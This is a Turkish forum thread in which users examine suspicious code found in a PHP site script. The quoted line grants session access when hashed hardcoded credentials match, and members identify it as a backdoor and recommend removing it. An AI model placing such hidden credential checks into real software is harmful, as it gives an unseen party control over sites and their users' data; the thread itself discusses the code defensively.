Voga adlı üyeden alıntı:
mesajı görüntüle
PHP sayfamda garip kod gördüm
12
●468
- 18-11-2023, 09:30:31haklısınız ama bence gerek yok komple silebilir.ntka adlı üyeden alıntı: mesajı görüntüle
if (isset($_SESSION["login"]) && re('k_adi') && md5(sha1(re('k_adi'))) == "d06457eb6d724de98ffd8ef5deee3171" and isset($_SESSION["login"]) && re('k_sifre') && md5(sha1(re('k_sifre'))) == "b404f70735137b2b93fd9401a9cc9233")if içersini bağlamış zaten sadece belirli bir kullanıcı için çalışan kod, giriş yapamamasında sorun olacağını düşünmüyorum sadece belirlediği bir kullanıcının sessiona id atamış.
eğer kaldırılmayıp önerdiğiniz gibi düzenlenirse bu session bütün login yapan kullanıcılara atanacaktır. daha tehlikeli bir durum hal alabilir. bununla artık ne yapılacaksa
- 18-11-2023, 09:36:05Amaç içeride neler yapıyor ne işler karıştırıyor onu gözlemlemek.
Hangi çağda yaşadığını unutmuş olmalı yapan
Ya komple yazılımı şifrele yada böyle gereksiz şeylerle uğraşma ama şimdi şöyle bir şey de var kodlara bakmayan birisi alıp kursa direk eleman siteye müdehale edebilir verileri silebilir vs..
Tehlikeli işler.
Bence bunu yapanı açıklasın konu sahibi yapan forumda ise ona dikkatli olsun diğer kullanıcılar.
iskendercnr adlı üyeden alıntı: mesajı görüntüle - 18-11-2023, 13:35:44Katılıyorum. Tam anlamıyla bir backdoor var, girip ne var ne yok diye kontrol etmek için yapmış. Dikkat etmek gerekir.ntka adlı üyeden alıntı: mesajı görüntüle